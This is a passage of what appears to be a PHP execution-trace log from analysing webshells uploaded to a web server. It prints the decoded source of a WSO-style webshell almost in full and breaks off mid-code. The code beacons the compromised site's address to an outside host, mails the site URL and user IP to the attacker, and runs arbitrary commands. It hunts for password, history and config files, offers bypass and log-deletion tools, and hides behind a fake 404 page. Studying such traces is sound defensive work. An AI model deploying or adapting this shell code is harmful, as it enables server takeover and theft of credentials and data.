2	36	R			'#0 /var/www/html/uploads/cmd.php(4) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/cmd.php(4): eval()\n#2 {main}'
1	35	1	1.028981	1065728
1	35	R			'Error: Call to undefined function set_magic_quotes_runtime() in /var/www/html/uploads/cmd.php(4) : eval()\'d code(1) : eval()\'d code:39\nStack trace:\n#0 /var/www/html/uploads/cmd.php(4) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/cmd.php(4): eval()\n#2 {main}'
			1.029034	986224
TRACE END   [2023-02-12 22:46:00.695253]

data/traces/9d98853a714da34855a92cb5ba345601_trace-1676249253.5392.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:47:59.437057]
1	0	1	0.000132	393512
1	3	0	0.000359	426920	{main}	1		/var/www/html/uploads/wso1.php	0	0
1		A						/var/www/html/uploads/wso1.php	2	$stt1 = 'Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5PSdUoLikqSi3TUCkuKTHQBAFrAA=='
1		A						/var/www/html/uploads/wso1.php	3	$stt0 = '==giaRh0F8f5IE/G8KH5v3IrqLs6PW3pZepZ8ytzr6s71BYnpA7XVH31eY+tJ+/e60aZbdeepGlru9DAMNP3V7GzKVc+4uPCbp554MJkh+HSTi3r2oyCd0O7KjMNaXviU0qmnvjD6UJ7RzGzLYVVz1JAFuSWKjB4WtG/AzcKYr8PeubxVD8RVwj3MvqAUeaYyUqujBuNQ1FpKL57P5FVHy0eGO5PhJzo6knxE0V7zpyIr2JdeTCYVsd2Vex0PPcSXUbmQ1PX9bUnAics2mJU9kptWMUb9y/rczV0AgygbmdlgIRBuT2rMyL0W4nuZvy0yUWZ5Vm5hdyupK5uxfh7CiKxzO7Gl6tg2W2ci7cwxYQeQuAAjtTkmA+yB6ZelB35NFTLp3e/R0SiMav4BnZLFg5MnC0M3ZCR20GZaClJAP7UmAENRrckT8yopoeiXGYqwtqjdxmyEb8mHahwqCnMmKNLYmgYqZywKUnSvK8nHLUuTZ+vKkH961C15zKzaOYF'
2	4	0	0.000438	426920	base64_decode	0		/var/www/html/uploads/wso1.php	4	1	'Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5PSdUoLikqSi3TUCkuKTHQBAFrAA=='
2	4	1	0.000457	427080
2	4	R			'K-K��P��S�K�*�K��-(J-.�H���K�I,I�HJ,N53�OIM�OI�(.)*J-�P).)1�\004\001k\000'
2	5	0	0.000478	427048	gzinflate	0		/var/www/html/uploads/wso1.php	4	1	'K-K��P��S�K�*�K��-(J-.�H���K�I,I�HJ,N53�OIM�OI�(.)*J-�P).)1�\004\001k\000'
2	5	1	0.000500	427176
2	5	R			'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2	6	0	0.000517	427016	htmlspecialchars_decode	0		/var/www/html/uploads/wso1.php	4	1	'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2	6	1	0.000534	427048
2	6	R			'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2	7	0	0.000561	428576	eval	1	'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'	/var/www/html/uploads/wso1.php	4	0
3	11	R			'<?php\r\nfunction GetIP(){\r\n    if(getenv("HTTP_CLIENT_IP")) {\r\n        $ip = getenv("HTTP_CLIENT_IP");\r\n    } elseif(getenv("HTTP_X_FORWARDED_FOR")) {\r\n        $ip = getenv("HTTP_X_FORWARDED_FOR");\r\n        if (strstr($ip, \',\')) {\r\n            $tmp = explode (\',\', $ip);\r\n            $ip = trim($tmp[0]);\r\n        }\r\n    } else {\r\n        $ip = getenv("REMOTE_ADDR");\r\n    }\r\n    return $ip;\r\n}\r\n$x = base64_decode(\'aHR0cDovL2J5cjAwdC5jby9sLQ==\').GetIP().\'-\'.base64_encode(\''
3	12	0	0.005572	1143752	eval	1	'?><?php\r\nfunction GetIP(){\r\n    if(getenv("HTTP_CLIENT_IP")) {\r\n        $ip = getenv("HTTP_CLIENT_IP");\r\n    } elseif(getenv("HTTP_X_FORWARDED_FOR")) {\r\n        $ip = getenv("HTTP_X_FORWARDED_FOR");\r\n        if (strstr($ip, \',\')) {\r\n            $tmp = explode (\',\', $ip);\r\n            $ip = trim($tmp[0]);\r\n        }\r\n    } else {\r\n        $ip = getenv("REMOTE_ADDR");\r\n    }\r\n    return $ip;\r\n}\r\n$x = base64_decode(\'aHR0cDovL2J5cjAwdC5jby9sLQ==\').GetIP().\'-\'.base64_encode(\'http://\'.$_SERVER[\'HTTP_HOST\'].$_SERVER[\'REQUEST_URI\']);\r\nif(function_exists(\'curl_init\'))\r\n{\r\n    $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch);\r\n    if($gitt == false){\r\n        @$gitt = file_get_contents($x);\r\n    }\r\n}elseif(function_exists(\'file_get_contents\')){\r\n    @$gitt = file_get_contents($x);\r\n}\r\n?><?php $auth_pass = "a6d13df8a46cf713e5cda6a6c0d043bf";\r\n $color = "#00ff66";\r\n $default_action = \'FilesMan\';\r\n @define(\'SELF_PATH\', __FILE__);\r\n if( strpos($_SERVER[\'HTTP_USER_AGENT\'],\'Google\') !== false ) { header(\'HTTP/1.0 404 Not Found\');\r\n exit;\r\n } @session_start();\r\n @error_reporting(0);\r\n @ini_set(\'error_log\',NULL);\r\n @ini_set(\'display_errors\',0);\r\n @ini_set(\'log_errors\',0);\r\n @ini_set(\'max_execution_time\',0);\r\n @set_time_limit(0);\r\n @set_magic_quotes_runtime(0);\r\n @define(\'VERSION\', \'\');\r\n if( get_magic_quotes_gpc() ) { function stripslashes_array($array) { return is_array($array) ? 
array_map(\'stripslashes_array\', $array) : stripslashes($array);\r\n } $_POST = stripslashes_array($_POST);\r\n } function printLogin() { echo \'<h1>Not Found</h1>\r\n <p>The requested URL was not found on this server.</p>\r\n <hr>\r\n <address>Apache Server at \'.$_SERVER[\'HTTP_HOST\'].\' Port 80</address>\r\n <style>input { margin:0;\r\nbackground-color:#fff;\r\nborder:1px solid #fff;\r\n }</style>\r\n <center><form method=post><input type=password name=pass></form></center>\';\r\n exit;\r\n } if( !isset( $_SESSION[md5($_SERVER[\'HTTP_HOST\'])] )) if( empty( $auth_pass ) || ( isset( $_POST[\'pass\'] ) && ( md5($_POST[\'pass\']) == $auth_pass ) ) ) $_SESSION[md5($_SERVER[\'HTTP_HOST\'])] = true;\r\n else printLogin();\r\n if( strtolower( substr(PHP_OS,0,3) ) == "win" ) $os = \'win\';\r\n else $os = \'nix\';\r\n $safe_mode = @ini_get(\'safe_mode\');\r\n $disable_functions = @ini_get(\'disable_functions\');\r\n $home_cwd = @getcwd();\r\n if( isset( $_POST[\'c\'] ) ) @chdir($_POST[\'c\']);\r\n $cwd = @getcwd();\r\n if( $os == \'win\') { $home_cwd = str_replace("\\\\", "/", $home_cwd);\r\n $cwd = str_replace("\\\\", "/", $cwd);\r\n } if( $cwd[strlen($cwd)-1] != \'/\' ) $cwd .= \'/\';\r\n if($os == \'win\') { $aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" );\r\n } else { $aliases = array( "List dir" => "ls -la", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . 
-type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \\"config*\\"", "find config* files in current dir" => "find . -type f -name \\"config*\\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . 
-type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files"=>"locate \'.conf\'", "locate .pwd files" => "locate \'.pwd\'", "locate .sql files" => "locate \'.sql\'", "locate .htpasswd files" => "locate \'.htpasswd\'", "locate .bash_history files" => "locate \'.bash_history\'", "locate .mysql_history files" => "locate \'.mysql_history\'", "locate .fetchmailrc files" => "locate \'.fetchmailrc\'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv" );\r\n } function ex($in) { $out = \'\';\r\n if(function_exists(\'exec\')) { @exec($in,$out);\r\n $out = @join("\\n",$out);\r\n }elseif(function_exists(\'passthru\')) { ob_start();\r\n @passthru($in);\r\n $out = ob_get_clean();\r\n }elseif(function_exists(\'system\')) { ob_start();\r\n @system($in);\r\n $out = ob_get_clean();\r\n }elseif(function_exists(\'shell_exec\')) { $out = shell_exec($in);\r\n }elseif(is_resource($f = @popen($in,"r"))) { $out = "";\r\n while(!@feof($f)) $out .= fread($f,1024);\r\n pclose($f);\r\n } return $out;\r\n } function which($p) { $path = ex(\'which \'.$p);\r\n if(!empty($path)) return $path;\r\n return false;\r\n } function printHeader() { if(empty($_POST[\'charset\'])) $_POST[\'charset\'] = "UTF-8";\r\n global $color;\r\n echo 
\'<html><head><meta http-equiv="Content-Type" content="text/html;\r\n charset=\'.$_POST[\'charset\'].\'"><title>r00t.info wso Shell</title><link REL="SHORTCUT ICON" HREF="http://imagizer.imageshack.us/a/img440/4273/6fix.png">\r\n <style>\r\n body {background-color:#222;\r\ncolor:#fff;\r\n}\r\n body,td,th { font: 9pt Lucida,Verdana;\r\nmargin:0;\r\nvertical-align:top;\r\n }\r\n span,h1,a { color:\'.$color.\' !important;\r\n }\r\n span { font-weight: bolder;\r\n }\r\n h1 { padding: 2px 5px;\r\nfont: 14pt Verdana;\r\nmargin:0px 0 0 5px;\r\n }\r\n div.content { padding: 5px;\r\nmargin:0 5px;\r\nbackground: #333333;\r\nborder-bottom:5px solid #444;\r\n}\r\n a { text-decoration:none;\r\n }\r\n a:hover { /*background:#5e5e5e;\r\n*/ }\r\n .ml1 { border:1px solid #444;\r\npadding:5px;\r\nmargin:0;\r\noverflow: auto;\r\n }\r\n .bigarea { width:100%;\r\nheight:250px;\r\nmargin-top:5px;\r\n}\r\n input, textarea, select { margin:0;\r\ncolor:#ff8c00;\r\nbackground-color:#555;\r\nborder:1px solid \'.$color.\';\r\n font: 9pt Monospace,"Courier New";\r\n }\r\n input[type="button"]:hover,input[type="submit"]:hover {background-color:\'.$color.\';\r\ncolor:#000;\r\n} \r\n form { margin:0px;\r\n }\r\n #toolsTbl { text-align:center;\r\n }\r\n .toolsInp { width: 80%;\r\n }\r\n .main th {text-align:left;\r\nbackground-color:#555;\r\nfont-weight: bold;\r\n}\r\n .main tr:hover{background-color:#008080;\r\n}\r\n .main td, th{vertical-align:middle;\r\n}\r\n .menu {background: #333;\r\n}\r\n .menu th{padding:5px;\r\nfont-weight:bold;\r\n}\r\n .menu th:hover{background:#008080;\r\n}\r\n .l1 {background-color:#444;\r\n}\r\n pre {font-family:Courier,Monospace;\r\n}\r\n #cot_tl_fixed{position:fixed;\r\nbottom:0px;\r\nfont-size:12px;\r\nleft:0px;\r\npadding:4px 0;\r\nclip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);\r\n_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);\r\n}\r\n 
.logo {text-align:center;\r\nfont-size:60px;\r\n}\r\n .logo sup {font-size: 15px;\r\nvertical-align: top;\r\nmargin-left: -14px;\r\n}\r\n .cpr {margin-bottom:5px;\r\nfont-weight:bold;\r\n}\r\n .cpb {width:34px;\r\nmargin:0 5px;\r\n}\r\n .eca1 {font-size: 16px;\r\nfont-weight: bold;\r\nletter-spacing: 10px;\r\nmargin: 0 2px 0 17px;\r\ntext-align: center;\r\n}\r\n .eca2 {font-size: 13px;\r\nfont-weight: bold;\r\nletter-spacing: 3px;\r\nmargin: 0 2px 0 7px;\r\ntext-align: center;\r\n}\r\n .npoad td {padding:0;\r\n}\r\n </style>\r\n <script>\r\n function set(a,c,p1,p2,p3,charset) {\r\n if(a != null)document.mf.a.value=a;\r\n\r\n if(c != null)document.mf.c.value=c;\r\n\r\n if(p1 != null)document.mf.p1.value=p1;\r\n\r\n if(p2 != null)document.mf.p2.value=p2;\r\n\r\n if(p3 != null)document.mf.p3.value=p3;\r\n\r\n if(charset != null)document.mf.charset.value=charset;\r\n\r\n }\r\n function g(a,c,p1,p2,p3,charset) {\r\n set(a,c,p1,p2,p3,charset);\r\n\r\n document.mf.submit();\r\n\r\n }\r\n function a(a,c,p1,p2,p3,charset) {\r\n set(a,c,p1,p2,p3,charset);\r\n\r\n var params = "ajax=true";\r\n\r\n for(i=0;\r\ni<document.mf.elements.length;\r\ni++)\r\n params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);\r\n\r\n sr("\'.$_SERVER[\'REQUEST_URI\'].\'", params);\r\n\r\n }\r\n function sr(url, params) { \r\n if (window.XMLHttpRequest) {\r\n req = new XMLHttpRequest();\r\n\r\n req.onreadystatechange = processReqChange;\r\n\r\n req.open("POST", url, true);\r\n\r\n req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");\r\n\r\n req.send(params);\r\n\r\n } \r\n else if (window.ActiveXObject) {\r\n req = new ActiveXObject("Microsoft.XMLHTTP");\r\n\r\n if (req) {\r\n req.onreadystatechange = processReqChange;\r\n\r\n req.open("POST", url, true);\r\n\r\n req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");\r\n\r\n req.send(params);\r\n\r\n }\r\n }\r\n }\r\n function processReqChange() {\r\n if( 
(req.readyState == 4) )\r\n if(req.status == 200) {\r\n //alert(req.responseText);\r\n\r\n var reg = new RegExp("(\\\\d+)([\\\\S\\\\s]*)", "m");\r\n\r\n var arr=reg.exec(req.responseText);\r\n\r\n eval(arr[2].substr(0, arr[1]));\r\n\r\n } \r\n else alert("Request error!");\r\n\r\n }\r\n </script>\r\n <head><body><div style="position:absolute;\r\nwidth:100%;\r\ntop:0;\r\nleft:0;\r\n"><div style="margin:5px;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\n">\r\n <form method=post name=mf style="display:none;\r\n">\r\n <input type=hidden name=a value="\'.(isset($_POST[\'a\'])?$_POST[\'a\']:\'\').\'">\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=p1 value="\'.(isset($_POST[\'p1\'])?htmlspecialchars($_POST[\'p1\']):\'\').\'">\r\n <input type=hidden name=p2 value="\'.(isset($_POST[\'p2\'])?htmlspecialchars($_POST[\'p2\']):\'\').\'">\r\n <input type=hidden name=p3 value="\'.(isset($_POST[\'p3\'])?htmlspecialchars($_POST[\'p3\']):\'\').\'">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n </form>\';\r\n $freeSpace = @diskfreespace($GLOBALS[\'cwd\']);\r\n $totalSpace = @disk_total_space($GLOBALS[\'cwd\']);\r\n $totalSpace = $totalSpace?$totalSpace:1;\r\n $disable_functions = @ini_get(\'disable_functions\');\r\n $release = @php_uname(\'r\');\r\n $kernel = @php_uname(\'s\');\r\n if(!function_exists(\'posix_getegid\')) { $user = @get_current_user();\r\n $uid = @getmyuid();\r\n $gid = @getmygid();\r\n $group = "?";\r\n } else { $uid = @posix_getpwuid(@posix_geteuid());\r\n $gid = @posix_getgrgid(@posix_getegid());\r\n $user = $uid[\'name\'];\r\n $uid = $uid[\'uid\'];\r\n $group = $gid[\'name\'];\r\n $gid = $gid[\'gid\'];\r\n } $cwd_links = \'\';\r\n $path = explode("/", $GLOBALS[\'cwd\']);\r\n $n=count($path);\r\n for($i=0;\r\n$i<$n-1;\r\n$i++) { $cwd_links .= "<a href=\'#\' onclick=\'g(\\"FilesMan\\",\\"";\r\n 
for($j=0;\r\n$j<=$i;\r\n$j++) $cwd_links .= $path[$j].\'/\';\r\n $cwd_links .= "\\")\'>".$path[$i]."/</a>";\r\n } $charsets = array(\'UTF-8\', \'Windows-1251\', \'KOI8-R\', \'KOI8-U\', \'cp866\');\r\n $opt_charsets = \'\';\r\n foreach($charsets as $item) $opt_charsets .= \'<option value="\'.$item.\'" \'.($_POST[\'charset\']==$item?\'selected\':\'\').\'>\'.$item.\'</option>\';\r\n $m = array(\'Sec. Info\'=>\'SecInfo\',\'Files\'=>\'FilesMan\',\'Console\'=>\'Console\',\'Sql\'=>\'Sql\',\'Php\'=>\'Php\',\'Delete LOG\'=>\'DeleteLOG\',\'Safe Mode\'=>\'SafeMode\',\'String tools\'=>\'StringTools\',\'Cgi\'=>\'Cgi\',\'Network\'=>\'Network\',\'Readable Dirs\'=>\'Readable\',\'Port Scanner\'=>\'PortScanner\',\'Symlink\'=>\'Symlink\',\'SQLBUDDY\'=>\'SQLBUDDY\',\'Bypass\'=>\'Bypass\',\'Python\'=>\'Python\');\r\n if(!empty($GLOBALS[\'auth_pass\'])) $m[\'SelfKill\'] = \'SelfRemove\';\r\n $m[\'Logout\'] = \'Logout\';\r\n $menu = \'\';\r\n foreach($m as $k => $v) $menu .= \'<th><a href="#" onclick="g(\\\'\'.$v.\'\\\',null,\\\'\\\',\\\'\\\',\\\'\\\')">\'.$k.\'</a></th>\';\r\n $drives = "";\r\n if ($GLOBALS[\'os\'] == \'win\') { foreach( range(\'a\',\'z\') as $drive ){ if (is_dir($drive.\':\\\\\')) $drives .= \'<a href="#" onclick="g(\\\'FilesMan\\\',\\\'\'.$drive.\':/\\\')">[ \'.$drive.\' ]</a> \';\r\n } $drives .= \'<br />: \';\r\n } if($GLOBALS[\'os\'] == \'nix\') { $dominios = @file_get_contents("/etc/named.conf");\r\n if(!$dominios) { $d0c = "CANT READ named.conf";\r\n } else { @preg_match_all(\'/.*?zone "(.*?)" {/\', $dominios, $out);\r\n $out = sizeof(array_unique($out[1]));\r\n $d0c = $out." 
Domains";\r\n } } else { $d0c = " --- ";\r\n } if($GLOBALS[\'os\'] == \'nix\' ) { $usefl = \'\';\r\n $dwnldr = \'\';\r\n if(!@ini_get(\'safe_mode\')) { $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');\r\n foreach($userful as $item) { if(which($item)) $usefl.= $item.\',\';\r\n } $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\r\n foreach($downloaders as $item2) { if(which($item2)) $dwnldr.= $item2.\',\';\r\n } } else { $usefl = \' ------- \';\r\n $dwnldr = \' ------- \';\r\n } } else { $usefl = \' ------- \';\r\n $dwnldr = \' ------- \';\r\n } echo \'<table class="info" cellpadding="0" cellspacing="0" width="100%"><tr><td width="160px"><div class="logo"><img src="http://i.hizliresim.com/z4lrbR.png" id="logo" height="75%" width="90%"/></div><hr style="margin: -5px 13px 2px 17px;\r\nwidth:160px;\r\n"><div class="eca1"></div><div class="eca2">Hackers</div></td>\r\n <td><table cellpadding="3" cellspacing="0" class="npoad"><tr><td width="125px;\r\n"><span>Uname</span></td><td>: <nobr>\'.substr(@php_uname(), 0, 120).\'</nobr></td></tr>\r\n <tr><td><span>User</span></td><td>: \'.$uid.\' ( \'.$user.\' ) <span>Group: </span> \'.$gid.\' ( \'.$group.\' )</td></tr><tr><td><span>Server</span></td><td>: \'.@getenv(\'SERVER_SOFTWARE\').\'</td></tr><tr><td><span>Useful</span></td><td>: \'.$usefl.\'</td></tr><tr><td><span>Downloaders</span></td><td>: \'.$dwnldr.\'</td></tr><tr><td><span>Disabled functions</span></td><td>: \'.($disable_functions?$disable_functions:\'All Function Enable\').\'</td></tr><tr><td><span>\'.($GLOBALS[\'os\'] == \'win\'?\'Drives<br />Cwd\':\'Cwd\').\'</span></td><td>: \'.$drives.\'\'.$cwd_links.\' \'.viewPermsColor($GLOBALS[\'cwd\']).\' <a href=# onclick="g(\\\'FilesMan\\\',\\\'\'.$GLOBALS[\'home_cwd\'].\'\\\',\\\'\\\',\\\'\\\',\\\'\\\')">[ home ]</a></td></tr></table></td>\'. 
\'<td width=1><nobr><span>Server IP</span><br><span>Client IP</span><br /><span>HDD</span><br /><span>Free</span><br /><span>PHP</span><br /><span>Safe Mode</span><br /><span>Domains</span></nobr></td>\'. \'<td><nobr>: \'.gethostbyname($_SERVER["HTTP_HOST"]).\'<br>: \'.$_SERVER[\'REMOTE_ADDR\'].\'<br />: \'.viewSize($totalSpace).\'<br />: \'.viewSize($freeSpace).\' (\'.(int)($freeSpace/$totalSpace*100).\'%)<br>: \'.@phpversion().\' <a href=# onclick="g(\\\'Php\\\',null,null,\\\'info\\\')">[ phpinfo ]</a><br />: \'.($GLOBALS[\'safe_mode\']?\'<font color=red>ON</font>\':\'<font color=\'.$color.\'<b>OFF</b></font>\').\'<br />: \'.$d0c.\'</nobr></td></tr></table>\'. \'</div></div><div style="margin:5;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\npadding:2px;\r\n"><table cellpadding="3" cellspacing="0" width="100%" class="menu"><tr>\'.$menu.\'</tr></table></div></div><div style="margin:5;\r\nbackground:#444;\r\n">\';\r\n } function printFooter() { $is_writable = is_writable($GLOBALS[\'cwd\'])?"<font color=#00cd00>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";\r\n echo \'</div><div style="margin:5px;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\n">\r\n<table class="info" id="toolsTbl" cellpadding="3" cellspacing="0" width="100%">\r\n <tr>\r\n <td><form onsubmit="g(null,this.c.value);\r\nreturn false;\r\n"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'"><input type=submit value=">>"></form></td>\r\n <td><form onsubmit="g(\\\'FilesTools\\\',null,this.f.value);\r\nreturn false;\r\n"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>\r\n </tr>\r\n <tr>\r\n <td><form onsubmit="g(\\\'FilesMan\\\',null,\\\'mkdir\\\',this.d.value);\r\nreturn false;\r\n"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit 
value=">>"></form>\'.$is_writable.\'</td>\r\n <td><form onsubmit="g(\\\'FilesTools\\\',null,this.f.value,\\\'mkfile\\\');\r\nreturn false;\r\n"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form>\'.$is_writable.\'</td>\r\n </tr>\r\n <tr>\r\n <td><form onsubmit="g(\\\'Console\\\',null,this.c.value);\r\nreturn false;\r\n"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>\r\n <td><form method="post" ENCTYPE="multipart/form-data">\r\n <input type=hidden name=a value="FilesMAn">\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=p1 value="uploadFile">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form>\'.$is_writable.\'</td>\r\n </tr>\r\n</table></div></div>\r\n<div style="margin:5px;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\ntext-align:center;\r\nfont-weight:bold;\r\n">Wso shell\'.VERSION.\' &copy;\r\n Shell</div></div>\r\n</div>\r\n</body></html>\';\r\n } if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getpwuid\')===false) ) { function posix_getpwuid($p) { return false;\r\n } } if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getgrgid\')===false) ) { function posix_getgrgid($p) { return false;\r\n } } if(!isset($_SESSION[\'trimite\'])){ $url=$_SERVER[\'HTTP_HOST\'].$_SERVER[\'REQUEST_URI\'].\'<br />User IP: \'.$_SERVER[\'REMOTE_ADDR\'].(isset($_SERVER[\'HTTP_X_FORWARDED_FOR\'])?\'(\'.$_SERVER[\'HTTP_X_FORWARDED_FOR\'].\')\':\'\');\r\n @mail("byhero44@gmail.com","Smurfie",$url);\r\n $_SESSION[\'trimite\']=true;\r\n } function viewSize($s) { if($s >= 1073741824) return sprintf(\'%1.2f\', $s / 1073741824 ). 
\' GB\';\r\n elseif($s >= 1048576) return sprintf(\'%1.2f\', $s / 1048576 ) . \' MB\';\r\n elseif($s >= 1024) return sprintf(\'%1.2f\', $s / 1024 ) . \' KB\';\r\n else return $s . \' B\';\r\n } function perms($p) { if (($p & 0xC000) == 0xC000)$i = \'s\';\r\n elseif (($p & 0xA000) == 0xA000)$i = \'l\';\r\n elseif (($p & 0x8000) == 0x8000)$i = \'-\';\r\n elseif (($p & 0x6000) == 0x6000)$i = \'b\';\r\n elseif (($p & 0x4000) == 0x4000)$i = \'d\';\r\n elseif (($p & 0x2000) == 0x2000)$i = \'c\';\r\n elseif (($p & 0x1000) == 0x1000)$i = \'p\';\r\n else $i = \'u\';\r\n $i .= (($p & 0x0100) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0080) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0040) ? (($p & 0x0800) ? \'s\' : \'x\' ) : (($p & 0x0800) ? \'S\' : \'-\'));\r\n $i .= (($p & 0x0020) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0010) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0008) ? (($p & 0x0400) ? \'s\' : \'x\' ) : (($p & 0x0400) ? \'S\' : \'-\'));\r\n $i .= (($p & 0x0004) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0002) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0001) ? (($p & 0x0200) ? \'t\' : \'x\' ) : (($p & 0x0200) ? 
\'T\' : \'-\'));\r\n return $i;\r\n } function viewPermsColor($f) { if (!@is_readable($f)) return \'<font color=#FF0000><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n elseif (!@is_writable($f)) return \'<font color=white><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n else return \'<font color=#00cd00><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n } if(!function_exists("scandir")) { function scandir($dir) { $dh = opendir($dir);\r\n while (false !== ($filename = readdir($dh))) { $files[] = $filename;\r\n } return $files;\r\n } } function actionSecInfo() { printHeader();\r\n echo \'<h1>Server security information</h1><div class=content>\';\r\n function showSecParam($n, $v) { $v = trim($v);\r\n if($v) { echo \'<span>\'.$n.\': </span>\';\r\n if(strpos($v, "\\n") === false) echo $v.\'<br>\';\r\n else echo \'<pre class=ml1>\'.$v.\'</pre>\';\r\n } } showSecParam(\'Server software\', @getenv(\'SERVER_SOFTWARE\'));\r\n showSecParam(\'Disabled PHP Functions\', ($GLOBALS[\'disable_functions\'])?$GLOBALS[\'disable_functions\']:\'none\');\r\n showSecParam(\'Open base dir\', @ini_get(\'open_basedir\'));\r\n showSecParam(\'Safe mode exec dir\', @ini_get(\'safe_mode_exec_dir\'));\r\n showSecParam(\'Safe mode include dir\', @ini_get(\'safe_mode_include_dir\'));\r\n showSecParam(\'cURL support\', function_exists(\'curl_version\')?\'enabled\':\'no\');\r\n $temp=array();\r\n if(function_exists(\'mysql_get_client_info\')) $temp[] = "MySql (".mysql_get_client_info().")";\r\n if(function_exists(\'mssql_connect\')) $temp[] = "MSSQL";\r\n if(function_exists(\'pg_connect\')) $temp[] = "PostgreSQL";\r\n if(function_exists(\'oci_connect\')) $temp[] = "Oracle";\r\n showSecParam(\'Supported databases\', implode(\', \', $temp));\r\n echo \'<br>\';\r\n if( $GLOBALS[\'os\'] == \'nix\' ) { $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');\r\n $danger = 
